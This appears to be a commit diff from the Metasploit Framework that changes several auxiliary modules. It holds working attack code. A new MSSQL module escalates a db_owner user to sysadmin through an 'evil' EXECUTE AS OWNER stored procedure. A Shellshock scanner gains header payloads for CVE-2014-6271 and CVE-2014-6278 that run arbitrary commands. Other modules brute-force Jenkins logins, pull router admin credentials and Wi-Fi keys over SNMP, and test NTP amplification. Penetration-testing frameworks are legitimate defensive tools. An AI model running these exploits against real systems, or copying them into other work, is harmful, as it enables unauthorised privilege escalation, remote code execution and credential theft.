rescue ::Errno::EISCONN
@socket.write(data)
end
end
def recv(max_bytes)

2
metasploit-framework.gemspec
View File

@ -81,4 +81,6 @@ Gem::Specification.new do |spec|
spec.add_runtime_dependency 'sqlite3'
# required for Time::TZInfo in ActiveSupport
spec.add_runtime_dependency 'tzinfo'
# required for OS fingerprinting
spec.add_runtime_dependency 'recog', '~> 1.0'
end

7
modules/auxiliary/admin/http/wp_custom_contact_forms.rb
View File

@ -13,10 +13,10 @@ class Metasploit3 < Msf::Auxiliary
'Description' => %q{
The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download
a SQL dump of the plugins database tables. It's also possible to upload files containing
sql statements which will be executed. The module first tries to extract the WordPress
SQL statements which will be executed. The module first tries to extract the WordPress
table prefix from the dump and then attempts to create a new admin user.
},
'Author' =>
'Author' =>
[
'Marc-Alexandre Montpas', # Vulnerability discovery
'Christian Mehlmauer' # Metasploit module
@ -25,7 +25,8 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html' ],
[ 'URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=' ]
[ 'URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=' ],
[ 'WPVDB', '7542' ]
],
'DisclosureDate' => 'Aug 07 2014'
))

185
modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb Normal file
View File

@ -0,0 +1,185 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server - Escalate Db_Owner',
'Description' => %q{
This module can be used to escalate privileges to sysadmin if the user has
the db_owner role in a trustworthy database owned by a sysadmin user. Once
the user has the sysadmin role the msssql_payload module can be used to obtain
a shell on the system.
},
'Author' => [ 'nullbind <scott.sutherland[at]netspi.com>'],
'License' => MSF_LICENSE,
'References' => [[ 'URL','http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx']]
))
end
def run
# Check connection and issue initial query
print_status("Attempting to connect to the database server at #{rhost}:#{rport} as #{datastore['USERNAME']}...")
if mssql_login_datastore
print_good('Connected.')
else
print_error('Login was unsuccessful. Check your credentials.')
disconnect
return
end
# Query for sysadmin status
print_status("Checking if #{datastore['USERNAME']} has the sysadmin role...")
user_status = check_sysadmin
# Check if user has sysadmin role
if user_status == 1
print_good("#{datastore['USERNAME']} has the sysadmin role, no escalation required.")
disconnect
return
else
print_status("You're NOT a sysadmin, let's try to change that")
end
# Check for trusted databases owned by sysadmins
print_status("Checking for trusted databases owned by sysadmins...")
trust_db_list = check_trust_dbs
if trust_db_list.nil? || trust_db_list.length == 0
print_error('No databases owned by sysadmin were found flagged as trustworthy.')
disconnect
return
else
# Display list of accessible databases to user
print_good("#{trust_db_list.length} affected database(s) were found:")
trust_db_list.each do |db|
print_status(" - #{db[0]}")
end
end
# Check if the user has the db_owner role in any of the databases
print_status('Checking if the user has the db_owner role in any of them...')
dbowner_status = check_db_owner(trust_db_list)
if dbowner_status.nil?
print_error("Fail buckets, the user doesn't have db_owner role anywhere.")
disconnect
return
end
# Attempt to escalate to sysadmin
print_status("Attempting to escalate in #{dbowner_status}!")
escalate_status = escalate_privs(dbowner_status)
if escalate_status
# Check if escalation was successful
user_status = check_sysadmin
if user_status == 1
print_good("Congrats, #{datastore['USERNAME']} is now a sysadmin!.")
else
print_error("Fail buckets, something went wrong.")
end
else
print_error("Error while trying to escalate status")
end
disconnect
return
end
# Checks if user is already sysadmin
def check_sysadmin
# Setup query to check for sysadmin
sql = "select is_srvrolemember('sysadmin') as IsSysAdmin"
# Run query
result = mssql_query(sql)
# Parse query results
parse_results = result[:rows]
status = parse_results[0][0]
# Return status
return status
end
# Gets trusted databases owned by sysadmins
def check_trust_dbs
# Setup query
sql = "SELECT d.name AS DATABASENAME
FROM sys.server_principals r
INNER JOIN sys.server_role_members m ON r.principal_id = m.role_principal_id
INNER JOIN sys.server_principals p ON
p.principal_id = m.member_principal_id
inner join sys.databases d on suser_sname(d.owner_sid) = p.name
WHERE is_trustworthy_on = 1 AND d.name NOT IN ('MSDB') and r.type = 'R' and r.name = N'sysadmin'"
result = mssql_query(sql)
# Return on success
return result[:rows]
end
# Checks if user has the db_owner role
def check_db_owner(trust_db_list)
# Check if the user has the db_owner role is any databases
trust_db_list.each do |db|
# Setup query
sql = "use #{db[0]};select db_name() as db,rp.name as database_role, mp.name as database_user
from [#{db[0]}].sys.database_role_members drm
join [#{db[0]}].sys.database_principals rp on (drm.role_principal_id = rp.principal_id)
join [#{db[0]}].sys.database_principals mp on (drm.member_principal_id = mp.principal_id)
where rp.name = 'db_owner' and mp.name = SYSTEM_USER"
# Run query
result = mssql_query(sql)
# Parse query results
parse_results = result[:rows]
if parse_results && parse_results.any?
print_good("- db_owner on #{db[0]} found!")
return db[0]
end
end
nil
end
def escalate_privs(dbowner_db)
print_status("#{dbowner_db}")
# Create the evil stored procedure WITH EXECUTE AS OWNER
evil_sql_create = "use #{dbowner_db};
DECLARE @myevil as varchar(max)
set @myevil = '
CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
as
begin
EXEC sp_addsrvrolemember ''#{datastore['USERNAME']}'',''sysadmin''
end';
exec(@myevil);
select 1;"
mssql_query(evil_sql_create)
# Run the evil stored procedure
evilsql_run = "use #{dbowner_db};
DECLARE @myevil2 as varchar(max)
set @myevil2 = 'EXEC sp_elevate_me'
exec(@myevil2);"
mssql_query(evilsql_run)
# Remove evil procedure
evilsql_remove = "use #{dbowner_db};
DECLARE @myevil3 as varchar(max)
set @myevil3 = 'DROP PROCEDURE sp_elevate_me'
exec(@myevil3);"
mssql_query(evilsql_remove)
true
end
end

34
modules/auxiliary/analyze/jtr_unshadow.rb
View File

@ -1,34 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'Unix Unshadow Utility',
'Description' => %Q{
This module takes a passwd and shadow file and 'unshadows'
them and saves them as linux.hashes loot.
},
'Author' => ['theLightCosine'],
'License' => MSF_LICENSE
)
register_options(
[
OptPath.new('PASSWD_PATH', [true, 'The path to the passwd file']),
OptPath.new('SHADOW_PATH', [true, 'The path to the shadow file']),
OptAddress.new('IP', [true, 'The IP address if the host the shadow file came from']),
], self.class)
end
def run
print_error "This module is deprecated and does nothing. It will be removed in the next release!"
end
end

3
modules/auxiliary/dos/http/wordpress_xmlrpc_dos.rb
View File

@ -29,7 +29,8 @@ class Metasploit3 < Msf::Auxiliary
['URL', 'http://wordpress.org/news/2014/08/wordpress-3-9-2/'],
['URL', 'http://www.breaksec.com/?p=6362'],
['URL', 'http://mashable.com/2014/08/06/wordpress-xml-blowup-dos/'],
['URL', 'https://core.trac.wordpress.org/changeset/29404']
['URL', 'https://core.trac.wordpress.org/changeset/29404'],
['WPVDB', '7526']
],
'DisclosureDate'=> 'Aug 6 2014'
))

4
modules/auxiliary/gather/doliwamp_traversal_creds.rb
View File

@ -26,8 +26,8 @@ class Metasploit3 < Msf::Auxiliary
'Author' => 'Brendan Coles <bcoles[at]gmail.com>',
'References' =>
[
['URL' => 'https://doliforge.org/tracker/?func=detail&aid=1212&group_id=144'],
['URL' => 'https://github.com/Dolibarr/dolibarr/commit/8642e2027c840752c4357c4676af32fe342dc0cb']
['URL', 'https://doliforge.org/tracker/?func=detail&aid=1212&group_id=144'],
['URL', 'https://github.com/Dolibarr/dolibarr/commit/8642e2027c840752c4357c4676af32fe342dc0cb']
],
'DisclosureDate' => 'Jan 12 2014'))
register_options(

88
modules/auxiliary/gather/hp_enum_perfd.rb Normal file
View File

@ -0,0 +1,88 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
# TODO: figure out what these do:
# o: valid command, takes no args, does nothing
# B, c, F, G, I, M, U, x: all require an "instance id" and possibly other args
ALLOWED_COMMANDS = %w(a A i g l p t T u w Z)
def initialize
super(
'Name' => 'HP Operations Manager Perfd Environment Scanner',
'Description' => %q{
This module will enumerate the process list of a remote machine by abusing
HP Operation Manager's unauthenticated 'perfd' daemon.
},
'Author' => [ 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' ],
'License' => MSF_LICENSE
)
commands_help = ALLOWED_COMMANDS.join(',')
register_options(
[
Opt::RPORT(5227),
OptString.new("COMMANDS", [true, "Command(s) to execute (one or more of #{commands_help})", commands_help])
], self.class)
end
def commands
datastore['COMMANDS'].split(/[, ]+/).map(&:strip)
end
def setup
super
if datastore['COMMANDS']
bad_commands = commands - ALLOWED_COMMANDS
unless bad_commands.empty?
fail ArgumentError, "Bad perfd command(s): #{bad_commands}"
end
end
end
def run_host(target_host)
begin
connect
banner_resp = sock.get_once
if banner_resp && banner_resp =~ /^Welcome to the perfd server/
banner_resp.strip!
print_good("#{target_host}:#{rport}, Perfd server banner: #{banner_resp}")
perfd_service = report_service(host: rhost, port: rport, name: "perfd", proto: "tcp", info: banner_resp)
sock.puts("\n")
commands.each do |command|
sock.puts("#{command}\n")
Rex.sleep(1)
command_resp = sock.get_once
loot_name = "HP Ops Agent perfd #{command}"
path = store_loot(
"hp.ops.agent.perfd.#{command}",
'text/plain',
target_host,
command_resp,
nil,
"HP Ops Agent perfd #{command}",
perfd_service
)
print_status("#{target_host}:#{rport} - #{loot_name} saved in: #{path}")
end
else
print_error("#{target_host}:#{rport}, Perfd server banner detection failed!")
end
disconnect
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue Timeout::Error => e
print_error(e.message)
end
end
end

3
modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
View File

@ -25,7 +25,8 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
['OSVDB', '88744'],
['URL', 'http://seclists.org/fulldisclosure/2012/Dec/242']
['URL', 'http://seclists.org/fulldisclosure/2012/Dec/242'],
['WPVDB', '6621']
],
'Author' =>
[

29
modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
View File

@ -29,10 +29,12 @@ class Metasploit4 < Msf::Auxiliary
},
'Author' => [
'Stephane Chazelas', # Vulnerability discovery
'wvu' # Metasploit module
'wvu', # Metasploit module
'lcamtuf' # CVE-2014-6278
],
'References' => [
['CVE', '2014-6271'],
['CVE', '2014-6278'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://access.redhat.com/articles/1200223'],
@ -47,12 +49,14 @@ class Metasploit4 < Msf::Auxiliary
OptString.new('METHOD', [true, 'HTTP method to use', 'GET']),
OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
OptString.new('CMD', [true, 'Command to run (absolute paths required)',
'/usr/bin/id'])
'/usr/bin/id']),
OptEnum.new('CVE', [true, 'CVE to check/exploit', 'CVE-2014-6271',
['CVE-2014-6271', 'CVE-2014-6278']])
], self.class)
end
def check_host(ip)
res = req("echo #{marker}")
res = req("echo #{marker}", datastore['CVE'])
if res && res.body.include?(marker * 3)
report_vuln(
@ -85,7 +89,7 @@ class Metasploit4 < Msf::Auxiliary
def run_host(ip)
return unless check_host(ip) == Exploit::CheckCode::Vulnerable
res = req(datastore['CMD'])
res = req(datastore['CMD'], datastore['CVE'])
if res && res.body =~ /#{marker}(.+)#{marker}/m
print_good("#{peer} - #{$1}")
@ -98,20 +102,31 @@ class Metasploit4 < Msf::Auxiliary
end
end
def req(cmd)
def req(cmd, cve)
case cve
when 'CVE-2014-6271'
sploit = cve_2014_6271(cmd)
when 'CVE-2014-6278'
sploit = cve_2014_6278(cmd)
end
send_request_cgi(
'method' => datastore['METHOD'],
'uri' => normalize_uri(target_uri.path),
'headers' => {
datastore['HEADER'] => sploit(cmd)
datastore['HEADER'] => sploit
}
)
end
def sploit(cmd)
def cve_2014_6271(cmd)
%Q{() { :;};echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"}
end
def cve_2014_6278(cmd)
%Q{() { _; } >_[$($())] { echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"; }}
end
def marker
@marker ||= Rex::Text.rand_text_alphanumeric(rand(42) + 1)
end

32
modules/auxiliary/scanner/http/drupal_views_user_enum.rb
View File

@ -35,11 +35,15 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('PATH', [true, "Drupal Path", "/"])
OptString.new('TARGETURI', [true, "Drupal Path", "/"])
], self.class)
end
def check(base_uri)
def base_uri
@base_uri ||= "#{normalize_uri(target_uri.path)}?q=admin/views/ajax/autocomplete/user/"
end
def check_host(ip)
res = send_request_cgi({
'uri' => base_uri,
'method' => 'GET',
@ -47,31 +51,21 @@ class Metasploit3 < Msf::Auxiliary
}, 25)
if not res
return false
return Exploit::CheckCode::Unknown
elsif res and res.body =~ /\<title\>Access denied/
# This probably means the Views Module actually isn't installed
print_error("#{rhost} - Access denied")
return false
vprint_error("#{rhost} - Access denied")
return Exploit::CheckCode::Safe
elsif res and res.message != 'OK' or res.body != '[ ]'
return false
return Exploit::CheckCode::Safe
else
return true
return Exploit::CheckCode::Appears
end
end
def run_host(ip)
# Make sure the URIPATH begins with '/'
datastore['PATH'] = normalize_uri(datastore['PATH'])
# Make sure the URIPATH ends with /
if datastore['PATH'][-1,1] != '/'
datastore['PATH'] = datastore['PATH'] + '/'
end
enum_uri = datastore['PATH'] + "?q=admin/views/ajax/autocomplete/user/"
# Check if remote host is available or appears vulnerable
if not check(enum_uri)
unless check_host(ip) == Exploit::CheckCode::Appears
print_error("#{ip} does not appear to be vulnerable, will not continue")
return
end
@ -83,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
vprint_status("Iterating on letter: #{l}")
res = send_request_cgi({
'uri' => enum_uri+l,
'uri' => base_uri+l,
'method' => 'GET',
'headers' => { 'Connection' => 'Close' }
}, 25)

3
modules/auxiliary/scanner/http/glassfish_login.rb
View File

@ -39,8 +39,8 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
# There is no TARGETURI because when Glassfish is installed, the path is /
Opt::RPORT(4848),
OptString.new('TARGETURI', [true, 'The URI path of the GlassFish Server', '/']),
OptString.new('USERNAME',[true, 'A specific username to authenticate as','admin']),
OptBool.new('SSL', [false, 'Negotiate SSL for outgoing connections', false]),
OptEnum.new('SSLVersion', [false, 'Specify the version of SSL that should be used', 'TLS1', ['SSL2', 'SSL3', 'TLS1']])
@ -97,7 +97,6 @@ class Metasploit3 < Msf::Auxiliary
@scanner = Metasploit::Framework::LoginScanner::Glassfish.new(
host: ip,
port: rport,
uri: datastore['URI'],
proxies: datastore["PROXIES"],
cred_details: @cred_collection,
stop_on_success: datastore['STOP_ON_SUCCESS'],

7
modules/auxiliary/scanner/http/http_version.rb
View File

@ -33,13 +33,12 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
begin
connect
res = send_request_raw({'uri' => '/', 'method' => 'GET' })
return if not res
res = send_request_raw({ 'uri' => '/', 'method' => 'GET' })
fp = http_fingerprint(:response => res)
print_status("#{ip}:#{rport} #{fp}") if fp
rescue ::Timeout::Error, ::Errno::EPIPE
ensure
disconnect
end
end

67
modules/auxiliary/scanner/http/jenkins_enum.rb
View File

@ -164,52 +164,37 @@ class Metasploit3 < Msf::Auxiliary
infos[td] = tds[idx+1].get_text.to_s.strip if infos.has_key?(td)
end
fprint = {}
jinfo = {}
# print out the goodies
infos.each do |k, v|
next if v.nil?
v = v.strip
next if v.length == 0
jinfo[k.gsub(/\s+/, '_')] = v
case k
when "os.name"
vprint_line(" OS: #{v}")
report_host({:host => rhost, :os_name => v})
fprint['os.product'] = v
when "os.version"
vprint_line(" OS Version: #{v}")
report_host({:host => rhost, :os_flavor => v})
fprint['os.version'] = v
when "sun.os.patch.level"
vprint_line(" Patch Level: #{v}")
when "os.arch"
vprint_line(" Arch: #{v}")
report_note({
:type => "system_arch",
:host => rhost,
:data => "Arch: #{v}",
:update => :unique_data
})
fprint['os.arch'] = v
when "user.name"
vprint_line(" User: #{v}")
report_note({
:type => "jenkins_user",
:host => rhost,
:port => rport,
:proto => 'tcp',
:data => "User: #{v}",
:update => :unique_data
})
when "USERDOMAIN"
vprint_line(" Domain: #{v}")
report_note({
:type => "system_domain",
:host => rhost,
:data => "Domain: #{v}",
:update => :unique_data
})
fprint['host.domain'] = v
when "COMPUTERNAME"
vprint_line(" Computer Name: #{v}")
report_note({
:type => "system_computer",
:host => rhost,
:data => "Computer Name: #{v}",
:update => :unique_data
})
fprint['host.name'] = v
when "SystemDrive"
vprint_line(" System Drive: #{v}")
when "SHELL"
@ -222,30 +207,20 @@ class Metasploit3 < Msf::Auxiliary
vprint_line(" Home Directory: #{v}")
when "user.language"
vprint_line(" Language: #{v}")
report_note({
:type => "system_lang",
:host => rhost,
:data => "Language: #{v}",
:update => :unique_data
})
fprint['os.language'] = v
when "user.country"
vprint_line(" Country: #{v}")
report_note({
:type => "system_country",
:host => rhost,
:data => "Country: #{v}",
:update => :unique_data
})
when "user.timezone"
vprint_line(" Timezone: #{v}")
report_note({
:type => "system_timezone",
:host => rhost,
:data => "Timezone: #{v}",
:update => :unique_data
})
end
end
# Report a fingerprint.match for OS fingerprinting support, tied to this service
report_note(:host => rhost, :port => rport, :proto => 'tcp', :ntype => 'fingerprint.match', :data => fprint)
# Report a jenkins information note for future analysis, tied to this service
report_note(:host => rhost, :port => rport, :proto => 'tcp', :ntype => 'jenkins.info', :data => jinfo)
vprint_line('')
end
end

74
modules/auxiliary/scanner/http/jenkins_login.rb Normal file
View File

@ -0,0 +1,74 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/jenkins'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
def initialize
super(
'Name' => 'Jenkins-CI Login Utility',
'Description' => 'This module attempts to login to a Jenkins-CI instance using a specific user/pass.',
'Author' => [ 'Nicholas Starke <starke.nicholas[at]gmail.com>' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(8080)
], self.class)
register_autofilter_ports([ 80, 443, 8080, 8081, 8000 ])
deregister_options('RHOST')
end
def run_host(ip)
cred_collection = Metasploit::Framework::CredentialCollection.new(
blank_passwords: datastore['BLANK_PASSWORDS'],
pass_file: datastore['PASS_FILE'],
password: datastore['PASSWORD'],
user_file: datastore['USER_FILE'],
userpass_file: datastore['USERPASS_FILE'],
username: datastore['USERNAME'],
user_as_pass: datastore['USER_AS_PASS']
)
scanner = Metasploit::Framework::LoginScanner::Jenkins.new(
host: ip,
port: rport,
proxies: datastore['PROXIES'],
cred_details: cred_collection,
stop_on_success: datastore['STOP_ON_SUCCESS'],
connection_timeout: 10,
user_agent: datastore['UserAgent'],
vhost: datastore['VHOST']
)
scanner.scan! do |result|
credential_data = result.to_h
credential_data.merge!(
module_fullname: fullname,
workspace_id: myworkspace_id
)
if result.success?
credential_core = create_credential(credential_data)
credential_data[:core] = credential_core
create_credential_login(credential_data)
print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
else
invalidate_login(credential_data)
vprint_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status})"
end
end
end
end

2
modules/auxiliary/scanner/http/wordpress_login_enum.rb
View File

@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary
# Brute force previously found users
if not usernames.empty?
print_status("#{target_uri} - Brute-forcing previously found accounts...")
passwords = load_password_vars(datastore['PASS_FILE'])
passwords = load_password_vars
usernames.each do |user|
passwords.each do |pass|
do_login(user, pass)

95
modules/auxiliary/scanner/ntp/ntp_readvar.rb
View File

@ -6,62 +6,83 @@
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::UDPScanner
include Msf::Auxiliary::NTP
include Msf::Auxiliary::DRDoS
def initialize(info = {})
super(update_info(info,
'Name' => 'NTP Clock Variables Disclosure',
'Description' => %q{
This module reads the system internal NTP variables. These variables contain
'Description' => %q(
This module reads the system internal NTP variables. These variables contain
potentially sensitive information, such as the NTP software version, operating
system version, peers, and more.
},
'Author' => [ 'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>' ],
),
'Author' =>
[
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>', # original Metasploit module
'Jon Hart <jon_hart[at]rapid7.com>' # UDPScanner version for faster scans
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL','http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ],
[ 'URL', 'http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ]
]
)
)
register_options(
[
Opt::RPORT(123)
], self.class)
end
def run_host(ip)
def scanner_process(data, shost, _sport)
@results[shost] ||= []
@results[shost] << Rex::Proto::NTP::NTPControl.new(data)
end
connect_udp
readvar = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" #readvar command
print_status("Connecting target #{rhost}:#{rport}...")
print_status("Sending command")
udp_sock.put(readvar)
reply = udp_sock.recvfrom(65535, 0.1)
if not reply or reply[0].empty?
print_error("#{rhost}:#{rport} - Couldn't read NTP variables")
return
def scan_host(ip)
if spoofed?
datastore['ScannerRecvWindow'] = 0
scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
else
scanner_send(@probe, ip, datastore['RPORT'])
end
p_reply = reply[0].split(",")
arr_count = 0
while ( arr_count < p_reply.size)
if arr_count == 0
print_good("#{rhost}:#{rport} - #{p_reply[arr_count].slice(12,p_reply[arr_count].size)}") #12 is the adjustment of packet garbage
arr_count = arr_count + 1
end
def scanner_prescan(batch)
@results = {}
print_status("Sending NTP v2 READVAR probes to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)")
@probe = Rex::Proto::NTP::NTPControl.new
@probe.version = datastore['VERSION']
@probe.operation = 2
end
def scanner_postscan(_batch)
@results.keys.each do |k|
# TODO: check to see if any of the responses are actually NTP before reporting
report_service(
host: k,
proto: 'udp',
port: rport,
name: 'ntp',
info: @results[k].map { |r| r.payload.slice(0,r.payload_size) }.join.inspect
)
peer = "#{k}:#{rport}"
response_map = { @probe => @results[k] }
vulnerable, proof = prove_amplification(response_map)
what = 'NTP Mode 6 READVAR DRDoS'
if vulnerable
print_good("#{peer} - Vulnerable to #{what}: #{proof}")
report_vuln(
host: k,
port: rport,
proto: 'udp',
name: what,
refs: references
)
else
print_good("#{rhost}:#{rport} - #{p_reply[arr_count].strip}")
arr_count = arr_count + 1
vprint_status("#{peer} - Not vulnerable to #{what}: #{proof}")
end
end
disconnect_udp
end
end

122
modules/auxiliary/scanner/smb/smb_version.rb
View File

@ -5,7 +5,7 @@
require 'msf/core'
require 'recog'
class Metasploit3 < Msf::Auxiliary
@ -34,90 +34,120 @@ class Metasploit3 < Msf::Auxiliary
)
deregister_options('RPORT')
deregister_options('SMBDIRECT')
@smb_port = 445
end
def rport
@rport || datastore['RPORT']
@smb_port || datastore['RPORT']
end
def smb_direct
@smbdirect || datastore['SMBDirect']
(@smb_port == 445)
end
# Fingerprint a single host
#
def run_host(ip)
[[445, true], [139, false]].each do |info|
@rport = info[0]
@smbdirect = info[1]
self.simple = nil
smb_ports = [445, 139]
smb_ports.each do |pnum|
@smb_port = pnum
self.simple = nil
begin
res = smb_fingerprint()
if(res['os'] and res['os'] != 'Unknown')
#
# Create the note hash for smb.fingerprint
#
conf = {
:native_os => res['native_os'],
:native_lm => res['native_lm']
}
case res['os']
when /Windows/
os = OperatingSystems::WINDOWS
else
case res['sp']
when /apple/
os = OperatingSystems::MAC_OSX
res['os'] = 'Mac OS X'
when /ubuntu/
os = OperatingSystems::LINUX
res['os'] = 'Ubuntu'
when /debian/
os = OperatingSystems::LINUX
res['os'] = 'Debian'
else
os = OperatingSystems::UNKNOWN
end
if res['os'] and res['os'] != 'Unknown'
#
# Create the note hash for fingerprint.match
#
match_conf = { }
#
# Create a descriptive string for service.info
#
desc = res['os'].dup
if res['edition'].to_s.length > 0
desc << " #{res['edition']}"
conf[:os_edition] = res['edition']
match_conf['os.edition'] = res['edition']
end
desc = "#{res['os']} #{res['sp']} (language: #{res['lang']})"
if(simple.client.default_name)
if res['sp'].to_s.length > 0
desc << " #{res['sp'].downcase.gsub('service pack ', 'SP')}"
conf[:os_sp] = res['sp']
match_conf['os.version'] = res['sp']
end
if res['build'].to_s.length > 0
desc << " (build:#{res['build']})"
conf[:os_build] = res['build']
match_conf['os.build'] = res['build']
end
if res['lang'].to_s.length > 0 and res['lang'] != 'Unknown'
desc << " (language:#{res['lang']})"
conf[:os_lang] = res['lang']
match_conf['os.language'] = conf[:os_lang]
end
if simple.client.default_name
desc << " (name:#{simple.client.default_name})"
conf[:SMBName] = simple.client.default_name
match_conf['host.name'] = conf[:SMBName]
end
if(simple.client.default_domain)
if simple.client.default_domain
desc << " (domain:#{simple.client.default_domain})"
conf[:SMBDomain] = simple.client.default_domain
match_conf['host.domain'] = conf[:SMBDomain]
end
print_status("#{rhost}:#{rport} is running #{desc}")
# Report the service with a friendly banner
report_service(
:host => ip,
:port => info[0],
:port => rport,
:proto => 'tcp',
:name => 'smb',
:info => desc
)
conf = {
:os_flavor => res['os'],
:os_name => os,
}
conf[:os_sp] = res['sp'] if res['sp']
conf[:os_lang] = res['lang'] if res['os'] =~ /Windows/
conf[:SMBName] = simple.client.default_name if simple.client.default_name
conf[:SMBDomain] = simple.client.default_domain if simple.client.default_domain
# Report a fingerprint.match hash for name, domain, and language
# Ignore OS fields, as those are handled via smb.fingerprint
report_note(
:host => ip,
:port => info[0],
:port => rport,
:proto => 'tcp',
:ntype => 'smb.fingerprint',
:data => conf
:ntype => 'fingerprint.match',
:data => match_conf
)
else
report_service(:host => ip, :port => info[0], :name => 'smb')
print_status("#{rhost} could not be identified")
desc = "#{res['native_os']} (#{res['native_lm']})"
report_service(:host => ip, :port => rport, :name => 'smb', :info => desc)
print_status("#{rhost}:#{rport} could not be identified: #{desc}")
end
# Report a smb.fingerprint hash of attributes for OS fingerprinting
report_note(
:host => ip,
:port => rport,
:proto => 'tcp',
:ntype => 'smb.fingerprint',
:data => conf
)
disconnect
break

315
modules/auxiliary/scanner/snmp/sbg6580_enum.rb Normal file
View File

@ -0,0 +1,315 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'ARRIS / Motorola SBG6580 Cable Modem SNMP Enumeration Module',
'Description' => 'This module allows SNMP enumeration of the ARRIS / Motorola
SURFboard SBG6580 Series Wi-Fi Cable Modem Gateway. It supports the username
and password for the device user interface as well as wireless network keys
and information.
The default community used is "public".',
'References' =>
[
[ 'URL', 'http://seclists.org/fulldisclosure/2014/May/79' ],
[ 'URL', 'http://www.arrisi.com/modems/datasheet/SBG6580/SBG6580_UserGuide.pdf' ],
[ 'OSVDB', '110555' ]
],
'Author' => 'Matthew Kienow <mkienow[at]inokii.com>',
'License' => MSF_LICENSE
))
# change SNMP version option to match device specification
register_options(
[
OptString.new('VERSION', [ true, 'SNMP Version <1/2c>', '2c' ])
], self.class)
end
def run_host(ip)
begin
snmp = connect_snmp
# represents the order of the output data fields
fields_order = [
"Host IP", "Username", "Password", "SSID", "802.11 Band",
"Network Authentication Mode", "WEP Passphrase", "WEP Encryption",
"WEP Key 1", "WEP Key 2", "WEP Key 3", "WEP Key 4",
"Current Network Key", "WPA Encryption", "WPA Pre-Shared Key (PSK)",
"RADIUS Server", "RADIUS Port", "RADIUS Key"
]
output_data = {"Host IP" => ip}
sys_descr = snmp.get_value('sysDescr.0')
if is_valid_snmp_value(sys_descr) and sys_descr.to_s =~ /SBG6580/
# print connected status after the first query so if there are
# any timeout or connectivity errors; the code would already
# have jumped to error handling where the error status is
# already being displayed.
print_good("#{ip}, Connected.")
# attempt to get the username and password for the device user interface
# using the CableHome cabhPsDevMib MIB module which defines the
# basic management objects for the Portal Services (PS) logical element
# of a CableHome compliant Residential Gateway device
device_ui_selection = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.3.0')
if is_valid_snmp_value(device_ui_selection) and device_ui_selection.to_i == 1
# manufacturerLocal(1) - indicates Portal Services is using the vendor
# web user interface shipped with the device
device_ui_username = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0')
if is_valid_snmp_value(device_ui_username)
output_data["Username"] = device_ui_username.to_s
end
device_ui_password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0')
if is_valid_snmp_value(device_ui_password)
